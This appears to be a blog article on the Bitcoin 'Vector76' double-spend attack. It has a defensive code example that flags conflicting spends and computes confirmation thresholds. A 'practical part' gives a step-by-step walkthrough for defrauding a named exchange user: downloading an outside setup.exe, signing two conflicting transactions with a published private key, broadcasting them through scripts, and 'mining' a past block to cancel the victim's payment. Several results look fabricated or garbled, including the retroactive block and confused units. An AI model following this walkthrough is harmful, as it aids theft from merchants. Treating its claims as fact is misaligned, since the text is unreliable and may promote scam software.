
Vector76 Attack: Researching and Preventing Threats to the Bitcoin Network Detailed Cryptanalysis Based on Real Data

With the development of cryptocurrency technologies and the increasing popularity of Bitcoin, various software such as Flash Bitcoin Software and Fake BTC Software has appeared on the market. These programs can have disastrous consequences for the Bitcoin ecosystem. In this article, we will look at what these programs are, how they work and what impact they have on the Bitcoin cryptocurrency using real data, as well as how they use the Vector76 Attack mechanism, which is a type of double-spending attack in which an attacker tries to conduct the same transaction twice. Unlike the classic double-spending attack, Vector76 exploits vulnerabilities in transaction confirmation mechanisms and time delays in the propagation of blocks across the Bitcoin network.



In a Vector76 attack, the attacker first creates two transactions: one to send funds to their Bitcoin address and one to send the same funds to the merchant’s Bitcoin address. They then try to convince the merchant to accept the unconfirmed transaction while simultaneously broadcasting the other transaction to the network. If the attacker manages to complete their transaction before the merchant receives confirmation, the funds will be sent to the attacker’s address rather than the merchant’s.


Software

Software makes it easy for an attacker to exploit the time slot between a transaction being confirmed on the local network and being propagated to the entire Bitcoin network. The attacker creates two transactions: one that is sent to the local network and one that is sent to the main network. If the attacker manages to send the first transaction before the second is confirmed, they can trick the recipient into believing that the first transaction is genuine. Let’s look at some of the most well-known software that uses time-slotting to successfully confirm a Bitcoin transaction.

Flash Bitcoin Software is software that allows users to temporarily increase their Bitcoin wallet balance. This is done by creating transactions that appear legitimate but are not actually confirmed on the blockchain. Such transactions can be used to deceive users and services that accept Bitcoin.

Fake BTC Software, in turn, is designed to create fake Bitcoin transactions. These transactions can be used for fraud, as they create the appearance of a transfer of funds, although in reality no funds are transferred. This software can be used to deceive sellers and buyers in cryptocurrency transactions.

Dockeyhunt Vector76 Attack is designed to create two or more Raw transactions for confirmation via Broadcast Bitcoin Transaction in a double-spend scenario with the same Bitcoin. The essence of the attack is that the attacker sends the same transaction to two different parts of the network, creating a temporary discrepancy in the Bitcoin blockchain. This software can also be used to deceive sellers and buyers in cryptocurrency transactions and operations where different tokens and various well-known cryptocurrencies (Bitcoin, Ethereum, etc.) are accepted.

CGMiner and BFGMiner are mining software and can be used to implement Selfish Mining attacks, as they allow miners to control the process of mining blocks.

Wireshark is network analysis software and can be used to analyze network traffic and implement Sybil Attack and Eclipse Attack. Fraudsters can use modified versions of the Bitcoin Core client to perform various attacks on the consensus mechanism.

BlockSci – This software allows you to analyze the blockchain and can be used to conduct transaction analysis and Dusting Attack (DUST ATTACK).


Impact of the attack on the Bitcoin network

Vector76 Attack was first described in 2011 and is a combination of Finney and Race attacks. The attack exploits vulnerabilities in the Bitcoin network transaction confirmation process. The basic idea is to create two conflicting transactions and run them through different nodes in the network, allowing the attacker to trick the recipient into double spending.

In a Race Attack, an attacker attempts to conduct two transactions simultaneously, one of which he attempts to reverse.

In a Finney Attack, an attacker pre-mines a block with a transaction and then attempts to conduct another transaction with the same coins.

In the Vector76 Attack, the attacker uses elements of both attacks to create a double spending attack.

The Vector76 attack could have serious consequences for the Bitcoin network. It undermines trust in the system, as users could lose funds due to double spending. In addition, the attack could cause delays in transaction confirmations and increase network congestion.

Attack stages:

  1. Create two transactions: The attacker creates two transactions with the same amount but different recipients. One transaction is sent to the network, and the other is held in an isolated part of the Bitcoin network.
  2. Sending the first transaction: The first transaction is sent to the local network, where it is quickly confirmed.
  3. Sending the second transaction: The second transaction is sent to the Bitcoin main network.
  4. First Transaction Confirmation: The recipient of the first transaction believes it is genuine and provides the product or service.
  5. Second transaction confirmation: The second transaction is confirmed on the main network and the first transaction becomes invalid.
  6. Conflict and Double Spend: As a result, a conflict occurs and one of the transactions may be included in the blockchain, resulting in a double spend.
  7. Network Merge: When an isolated part of the network merges with the main network, a conflict occurs and one of the transactions is cancelled.

Vector76 Attack Detection and Prevention Mechanisms:

To protect the Bitcoin network from Vector76 attacks, various mechanisms for detecting and preventing attacks are used, and effective algorithms and systems for detecting suspicious transactions must be implemented. Let’s consider several approaches:

  1. Block and transaction analysis: Mining software and network nodes analyze blocks and transactions for conflicts and anomalies.
  2. Increase the number of confirmations: It is recommended to wait for a larger number of confirmations (e.g. 6 or more) before considering a transaction as finally confirmed. Increasing the time to wait for a transaction to be confirmed can reduce the likelihood of a successful attack.
  3. Using Machine Learning Algorithms: Modern machine learning techniques can be used to detect suspicious patterns in transactions and blocks.
  4. Network Monitoring: Using specialized software to monitor the network for suspicious transactions and behavior.
  5. Multi-Level Confirmation: Using multiple levels of transaction confirmation can improve security.
  6. Anomaly Analysis: Implementation of anomaly analysis systems to identify suspicious transactions and blockchains.
  7. Updating Protocols: Regularly updating security protocols and implementing new security methods can improve the network’s resilience to attacks.
  8. Strengthening the consensus mechanism: Implementing additional checks and confirmations for transactions, which will make it more difficult to carry out attacks.
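
The following added example, which is not from this article or from any tool it names, illustrates approaches 1 and 2 from the merchant's side: it parses serialized transactions, flags any outpoint spent by more than one observed transaction (the T1/T2 pattern), and holds a payment until enough confirmations have accumulated. The sample transactions are constructed, the function names are hypothetical, and the risk model is Nakamoto's catch-up estimate from the Bitcoin whitepaper with an assumed attacker hash share q.

```python
import struct
from collections import defaultdict
from math import exp


def read_varint(buf, pos):
    """Decode a Bitcoin CompactSize integer; return (value, next_pos)."""
    first = buf[pos]
    if first < 0xFD:
        return first, pos + 1
    size = {0xFD: 2, 0xFE: 4, 0xFF: 8}[first]
    return int.from_bytes(buf[pos + 1:pos + 1 + size], "little"), pos + 1 + size


def parse_outpoints(raw):
    """Return the (prev_txid_hex, vout) pairs spent by a serialized transaction."""
    if len(raw) < 10:
        raise ValueError("transaction too short")
    pos = 4  # skip the 4-byte version
    if raw[4] == 0x00 and raw[5] == 0x01:  # segwit marker and flag
        pos += 2
    count, pos = read_varint(raw, pos)
    outpoints = []
    for _ in range(count):
        if pos + 37 > len(raw):
            raise ValueError("truncated input")
        txid = raw[pos:pos + 32][::-1].hex()  # wire order is byte-reversed
        vout = struct.unpack_from("<I", raw, pos + 32)[0]
        script_len, pos = read_varint(raw, pos + 36)
        pos += script_len + 4  # skip scriptSig and nSequence
        outpoints.append((txid, vout))
    return outpoints


def find_conflicts(seen):
    """seen maps a label to raw tx bytes; return outpoints spent by more than one tx."""
    spenders = defaultdict(list)
    for label, raw in seen.items():
        for outpoint in parse_outpoints(raw):
            spenders[outpoint].append(label)
    return {op: labels for op, labels in spenders.items() if len(labels) > 1}


def catch_up_probability(q, z):
    """Nakamoto's estimate that an attacker with hash share q overtakes z confirmations."""
    p = 1.0 - q
    if q >= p:
        return 1.0
    lam = z * q / p
    total, poisson = 0.0, exp(-lam)
    for k in range(z + 1):
        total += poisson * (1 - (q / p) ** (z - k))
        poisson *= lam / (k + 1)
    return 1.0 - total


def confirmations_needed(q, max_risk):
    """Smallest confirmation count whose catch-up probability is at most max_risk."""
    if q >= 0.5:
        raise ValueError("no confirmation count is safe against a majority attacker")
    z = 0
    while catch_up_probability(q, z) > max_risk:
        z += 1
    return z


def payment_decision(label, seen, confirmations, q=0.10, max_risk=0.001):
    """Merchant-side policy: hold on any conflicting spend or on too few confirmations."""
    if any(label in labels for labels in find_conflicts(seen).values()):
        return "HOLD_CONFLICT"
    if confirmations < confirmations_needed(q, max_risk):
        return "HOLD_CONFIRMATIONS"
    return "ACCEPT"


def sample_tx(prev_txid, vout, value, script_pubkey):
    """Constructed sample: unsigned one-input, one-output legacy transaction."""
    return (struct.pack("<I", 1) + b"\x01" + bytes.fromhex(prev_txid)[::-1]
            + struct.pack("<I", vout) + b"\x00" + struct.pack("<I", 0xFFFFFFFF)
            + b"\x01" + struct.pack("<Q", value)
            + bytes([len(script_pubkey)]) + script_pubkey + struct.pack("<I", 0))


# Constructed inputs: T1 and T2 spend the same outpoint, T3 spends a different one.
FUNDING = "11" * 16 + "22" * 16
SEEN = {
    "T1": sample_tx(FUNDING, 0, 50_000, b"\x51"),
    "T2": sample_tx(FUNDING, 0, 50_000, b"\x52"),
    "T3": sample_tx("33" * 32, 1, 20_000, b"\x51"),
}

if __name__ == "__main__":
    print(find_conflicts(SEEN))
    for tx, confs in (("T1", 1), ("T3", 1), ("T3", 6)):
        print(tx, confs, payment_decision(tx, SEEN, confs))
```

In practice `seen` would be fed from the mempools and recent blocks of several independently connected nodes, since a conflict is only visible to a monitor that observes both parts of the network.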

Distribution of an alternative block for carrying out Vector76 Attack:

  1. Creating Two Conflicting Transactions: An attacker creates two transactions that use the same inputs but have different recipients.
  2. First Transaction Propagation: The first transaction is sent to the network and included in a block that miners begin to confirm.
  3. Creating an alternative block: The attacker uses their own mining software to create an alternative block containing the second transaction.
  4. Propagation of an alternative block: At a time when the first transaction has already received several confirmations, the attacker propagates an alternative block that may be accepted by the network if it contains more confirmations.

Structure of Vector76 Attack:

  1. Setup: The attacker creates two transactions: one for the victim (T1) and one for himself (T2).
  2. Block mining: An attacker mines a block that includes T2 but does not publish it.
  3. T1 execution: The attacker sends T1 to the network and the victim accepts it after one confirmation.
  4. Block Publishing: The attacker publishes a block with T2, which cancels T1.

Practical part

Let’s look at an example of this attack using the Dockeyhunt Vector76 Attack software.

Download the software from the official website: www.dockeyhunt.com


We will install all the necessary packages and libraries and run the setup.exe file.


To carry out a successful attack, it is very important for us to create a second transaction (T2, for ourselves). For this, we need to prepare a Bitcoin Wallet in advance, where we will send all our BTC coins for further storage in a cold wallet. Open the folder and run Cold Bitcoin Wallet.exe to generate a new Bitcoin Address.


Click Generate Address


Our new Bitcoin Address details for further storage in a cold wallet.



Now we establish a connection with the recipient; in our case the pseudo-recipient is a user of the Huobi crypto exchange.


Bitcoin Pseudo-recipient address:


https://bitinfocharts.com/bitcoin/address/143gLvWYUojXaWZRrxquRKpVNTkhmr415B



Creating Raw Transaction T1 (Victim)

The pseudo-recipient (victim) is a user of the Huobi crypto exchange and expects from the sender (attacker) an amount of: 1.17506256 BTC (in Bitcoin cryptocurrency)

Sender’s Bitcoin Wallet for the amount: 1.17521256 BTC


https://btc1.trezor.io/address/1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz


Let’s open a new notebook in Google Colab : https://colab.research.google.com

Clone the Broadcast-Bitcoin-Transaction repository

!git clone https://github.com/smartibase/Broadcast-Bitcoin-Transaction.git

cd Broadcast-Bitcoin-Transaction/

ls

Run Python script bitcoin_info.py (to check the Bitcoin sender address)

!python3 bitcoin_info.py

1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz

To create Raw transaction T1, we need to copy the last TXID from the UTXO (Unspent Transaction Output) of Bitcoin Address 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz, that is, an unspent transaction output of the sender’s wallet.

https://btc1.trezor.io/tx/3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861


Let’s go back to the root directory and run the Dockeyhunt Vector76 Attack software


Option:

When creating a transaction, we need to sign it with the ECDSA algorithm, so we insert the private key of the sender’s Bitcoin Wallet 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz into the field (for verification, we can use bitaddress).

Private Key: KwoqiXXrWkurxSazHJtmxKstB7g4HX247q7JoKcFDtHpFujKNSiD

Copy TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861 and paste it into the field. This is necessary to ensure that transactions are fully verified for all Bitcoin network nodes, as all transaction inputs are valid (this is very important and necessary for a successful Vector76 attack to ensure that the sender’s BTC coins are not spent in advance). UTXO allows for more efficient transaction processing, as each transaction output can only be used once (this simplifies the management of the Bitcoin network state and reduces the complexity of verifying Raw transactions).

Prev TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861

Copy the Bitcoin Address of the pseudo-recipient of the Huobi crypto exchange : 143gLvWYUojXaWZRrxquRKpVNTkhmr415B and paste it into the field.

Send Address: 143gLvWYUojXaWZRrxquRKpVNTkhmr415B

Copy the total amount of Bitcoin coins and paste it into the field (for this sender the amount is 1.17521256 BTC; it must be specified in Satoshi: 117521256).

Total Received: 1.17521256 BTC (117521256 sat/vByte)

Let’s specify our own amount of 15000 sat/vByte; this amount is the commission paid to the miner for processing the transaction. In Bitcoin, when we send a transaction, we pay a commission to the miners for including our Raw transaction in the blockchain (this commission incentivizes miners to process and confirm transactions).

Fee: 0.00015000 BTC (15000 sat/vByte)

Let’s specify the amount of BTC coins to send: subtracting the commission of 15000 sat/vByte from the total amount of 117521256 sat/vByte, the amount to send in Satoshi will be 117506256.

Sent: 1.17506256 BTC (117506256 sat/vByte)

After we have added all the options, click Create Transaction



Result:

Your Bitcoin Address: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz
Bitcoin Address for sending BTC: 143gLvWYUojXaWZRrxquRKpVNTkhmr415B
Bitcoin Transaction RawTX:
010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006b483045022100dff55be52be07900dd4d2d04473c93249ca78e37955e466437c26f06322f01bc02205ed04a2a4201e8c2b3035de7edfa972e1f7da57dbcca3eaa4fbd4db4cd8ad507012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddffffffff01d0000107000000001976a914216a0d339ab6ddc696b1b239b9b65810c0bf73d588ac00000000



Now let’s use the Python script: pushtx.py to send Bitcoin Transaction RawTX

!python3 pushtx.py

010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006b483045022100dff55be52be07900dd4d2d04473c93249ca78e37955e466437c26f06322f01bc02205ed04a2a4201e8c2b3035de7edfa972e1f7da57dbcca3eaa4fbd4db4cd8ad507012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddffffffff01d0000107000000001976a914216a0d339ab6ddc696b1b239b9b65810c0bf73d588ac00000000

Result:

Enter your raw transaction: 010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006b483045022100dff55be52be07900dd4d2d04473c93249ca78e37955e466437c26f06322f01bc02205ed04a2a4201e8c2b3035de7edfa972e1f7da57dbcca3eaa4fbd4db4cd8ad507012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddffffffff01d0000107000000001976a914216a0d339ab6ddc696b1b239b9b65810c0bf73d588ac00000000
TX: e129cd4257b2c9f5061dfb80d8b7a59e62cbaf3cdfba8d3fde2953759e63bcf0
Transaction successfully broadcasted!
Broadcasting Transactions into the Bitcoin Network: https://broad-casts.ru/bitcoin-network

A pseudo-recipient user of the Huobi crypto exchange sees a payment on the Bitcoin TX network: e129cd4257b2c9f5061dfb80d8b7a59e62cbaf3cdfba8d3fde2953759e63bcf0

Now the attacker proceeds to the second stage, creating a T2 transaction (for himself) to take all the coins for the sent amount of 1.17506256 BTC (117506256 sat/vByte) from the Bitcoin network to the balance of his cold wallet.



Create Raw transaction T2 (for yourself)

Previously we created a cold Bitcoin Wallet; we did this in advance specifically for the second transaction (T2, for ourselves), preparing the Bitcoin Wallet 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq, where we will send from the Bitcoin network all coins in the amount of 1.17506256 BTC (117506256 sat/vByte) for further storage in a cold wallet.


Copy the Bitcoin Address of the new cold wallet:

Cold Bitcoin Wallet:

Public Address 1 compressed: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq

Let’s re-launch the Dockeyhunt Vector76 Attack software.


Let’s add a new option with new data

Option:

As before, to create the transaction we need to sign it with the ECDSA algorithm, so we insert the private key of the sender’s Bitcoin Wallet 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz into the field (for verification, we can use bitaddress).

Private Key: KwoqiXXrWkurxSazHJtmxKstB7g4HX247q7JoKcFDtHpFujKNSiD

Copy TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861 and paste it into the field. This is necessary to ensure that transactions are fully verified for all Bitcoin network nodes, as all transaction inputs are valid (this is very important and necessary for a successful Vector76 attack to ensure that the sender’s BTC coins are not spent in advance). UTXO allows for more efficient transaction processing, as each transaction output can only be used once (this simplifies the management of the Bitcoin network state and reduces the complexity of verifying Raw transactions).

Prev TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861

Let’s copy the new Bitcoin Address of the new cold wallet where we will transfer all BTC coins : 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq and paste it into the field.

Send Address: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq

Copy the total amount of Bitcoin coins and paste it into the field (for this sender the amount is 1.17521256 BTC; it must be specified in Satoshi: 117521256).

Total Received: 1.17521256 BTC (117521256 sat/vByte)

Let’s specify our own amount of 15000 sat/vByte; this amount is the commission paid to the miner for processing the transaction. In Bitcoin, when we send a transaction, we pay a commission to the miners for including our Raw transaction in the blockchain (this commission incentivizes miners to process and confirm transactions).

Fee: 0.00015000 BTC (15000 sat/vByte)

Let’s specify the amount of BTC coins to send: subtracting the commission of 15000 sat/vByte from the total amount of 117521256 sat/vByte, the amount to send in Satoshi will be 117506256.

Sent: 1.17506256 BTC (117506256 sat/vByte)

After we have added all the options, click Create Transaction


Result:

Your Bitcoin Address: 1888dvSYUx23z2NF79NyCaYQ8dxcWCjHDz
Bitcoin Address for sending BTC: 1qqQcZbZNvsZoF5x3VcnEcJbzPeXncfKq
Bitcoin Transaction RawTX:
010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006a473044022027033ea1c9df979fe39b016ee9ef446fab3e87dd4514623ad8a655e8eab31f0002201b58688b9949a8b9b05cb74b3bd829f6c134c5bef132e9df0eafeea9585abc45012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddfdffffff01d0000107000000001976a914093c5fd87ffc1f2bb3a58ffec06976c5c760d04988ac00000000



Now let’s use the Python script: pushtx.py to send Bitcoin Transaction RawTX

!python3 pushtx.py

Result:

Enter your raw transaction: 010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006a473044022027033ea1c9df979fe39b016ee9ef446fab3e87dd4514623ad8a655e8eab31f0002201b58688b9949a8b9b05cb74b3bd829f6c134c5bef132e9df0eafeea9585abc45012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddfdffffff01d0000107000000001976a914093c5fd87ffc1f2bb3a58ffec06976c5c760d04988ac00000000
TX: d7b2f7279687abd3abf0367ac31223359dc8b53b32b7adbdfc2d0ada2a8015bc
Transaction successfully broadcasted!
Broadcasting Transactions into the Bitcoin Network: https://broad-casts.ru/bitcoin-network

Now we have received TX: d7b2f7279687abd3abf0367ac31223359dc8b53b32b7adbdfc2d0ada2a8015bc. All that remains is to mine the block that includes the T2 transaction (for ourselves) and publish it to the main blockchain.


Mining and publishing a block to the Bitcoin network main chain

Let’s go back to the root directory, open the folder and run the Block Bitcoin Mining software


To fill in the empty field, we need input data for certain values to configure the mining block. To do this, run the Python script block_header.py and enter the UTXO value we know, which we previously added to the Prev TXID option when creating the Raw transaction. Prev TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861

UTXO allows for more efficient transaction processing, as each transaction output can only be used once (this simplifies the management of the Bitcoin network state and reduces the complexity of verifying Raw transactions).

!python3 block_header.py

3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861

Let’s copy the received data:

Enter TXID: 3141bd1a32ac5e5b1a0de837faceccbc78f80f277c060855eab23be0fbe6e861
Block Header:
Block: 00000000000000000003e5557c14e955f2c88465bb8c02a4d694a3657a40d79e
Block Height: 808875
Mined Time: 2023-09-22T17:29:25Z
Prev Block: 000000000000000000048e0643366b7c0129d2dd8d2cf758ca6273ed81c765d8
Merkle Root: c1fc30413e984cdd90dc1ac91a69add6c138af950e1c6388cb20759494073d2c
Nonce: 1098256692
Bits: 386198911
Version: 536903680

Let’s add RawTX for T2 transaction (for ourselves)

Bitcoin Transaction RawTX:
010000000161e8e6fbe03bb2ea5508067c270ff878bccccefa37e80d1a5b5eac321abd4131000000006a473044022027033ea1c9df979fe39b016ee9ef446fab3e87dd4514623ad8a655e8eab31f0002201b58688b9949a8b9b05cb74b3bd829f6c134c5bef132e9df0eafeea9585abc45012102650afad13f8fb85925ba6765dc5416bad623cdfce3f104191964253a12ed0cddfdffffff01d0000107000000001976a914093c5fd87ffc1f2bb3a58ffec06976c5c760d04988ac00000000


Once the block for the T2 transaction (for yourself) is mined using the Block Bitcoin Mining software, we will receive a file in JSON format



Our mined block for confirmation in the general blockchain chain is located in the file: block_hash_mining.json

Let’s open the file: block_hash_mining.json using Notepad++



In line #875 we see a new block.

block_hash: 00000000000000000004401ea0694af9c89564d76bc5462577e312eea5d23fa2



Let’s go back to Google Colab and run the Python script, entering the TXID of the T2 transaction (for ourselves).


EVERYTHING IS CORRECT!!!

The block confirms the authenticity of transaction T2 (for ourselves).


Let’s also check the link in the blockchain:

https://btc1.trezor.io/tx/d7b2f7279687abd3abf0367ac31223359dc8b53b32b7adbdfc2d0ada2a8015bc


Payment confirmed by miners



Transaction T1 (victim) is cancelled

The payment to the Huobi crypto exchange user (pseudo-recipient) is automatically canceled on the Bitcoin TX network: e129cd4257b2c9f5061dfb80d8b7a59e62cbaf3cdfba8d3fde2953759e63bcf0


https://btc1.trezor.io/tx/e129cd4257b2c9f5061dfb80d8b7a59e62cbaf3cdfba8d3fde2953759e63bcf0

Transaction not found due to not being in the general block chain


Conclusion:

All of this software and these tools facilitate the creation of fraudulent schemes, which can lead to an increase in the number of victims and losses of BTC and ETH coins among users. This, in turn, can cause a negative attitude towards cryptocurrencies and the crypto community as a whole.

Damage to Business: Many companies and services that accept Bitcoin may suffer significant losses due to the use of fake transactions. This may lead to the refusal to accept Bitcoin as a means of payment, which will also negatively affect its adoption.

Increased complexity of regulation: The use of such software complicates the work of regulators and law enforcement agencies who are trying to combat fraud and money laundering. This may lead to stricter regulations and restrictions on the use of cryptocurrencies.

Need for improved security: Constant threats require developers and users to implement new security measures and improve existing protection mechanisms. The Bitcoin developer community can take steps to combat fraudulent transactions. This may include improving transaction confirmation algorithms and introducing new security protocols. However, such measures may require significant resources and time.




This material was created for the CRYPTO DEEP TECH portal to ensure financial data security and cryptography on elliptic curves secp256k1 against weak ECDSA signatures in the BITCOIN cryptocurrency. The creators of the software are not responsible for the use of materials.


Source

Telegram: https://t.me/cryptodeeptech

Video material: https://youtu.be/Mk_BPBCXd3I

DZEN: https://dzen.ru/video/watch/669558eb4bbd297f7d375e06

Source: https://cryptodeeptech.ru/vector76-attack

